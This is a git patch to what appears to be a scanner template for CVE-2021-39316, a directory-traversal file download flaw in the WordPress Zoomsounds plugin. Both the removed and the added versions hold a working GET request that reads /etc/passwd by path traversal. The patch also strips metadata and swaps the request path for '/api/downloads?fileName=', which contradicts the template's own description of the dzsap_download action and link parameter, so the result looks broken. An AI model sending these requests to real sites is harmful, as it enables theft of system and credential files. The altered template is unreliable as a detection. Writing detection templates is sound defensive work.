From 51231d0ea618c1152dd71d2577873f13c47754be Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Sun, 27 Feb 2022 21:13:00 +0530
Subject: [PATCH] Add files via upload

---
 cves/2021/CVE-2021-39316.yaml | 52 ++++++++++++++---------------------
 1 file changed, 20 insertions(+), 32 deletions(-)

diff --git a/cves/2021/CVE-2021-39316.yaml b/cves/2021/CVE-2021-39316.yaml
index 693e3bd541..bf881c3819 100644
--- a/cves/2021/CVE-2021-39316.yaml
+++ b/cves/2021/CVE-2021-39316.yaml
@@ -1,32 +1,20 @@
-id: CVE-2021-39316
-
-info:
-  name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
-  author: daffainfo
-  severity: high
-  description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
-  reference:
-    - https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39316
-  tags: wordpress,cve2021,cve,lfi,wp-plugin
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.50
-    cve-id: CVE-2021-39316
-    cwe-id: CWE-22
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
-
-    matchers-condition: and
-    matchers:
-
-      - type: regex
-        regex:
-          - "root:.*:0:0"
-
-      - type: status
-        status:
-          - 200
+id: CVE-2021-39316
+info:
+  name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
+  author: pussycat0x
+  severity: high
+  description: The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the dzsap_download action using directory traversal in the link parameter.
+  reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
+  tags: lfi,wordpress
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd"
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+      - type: status
+        status:
+          - 200
\ No newline at end of file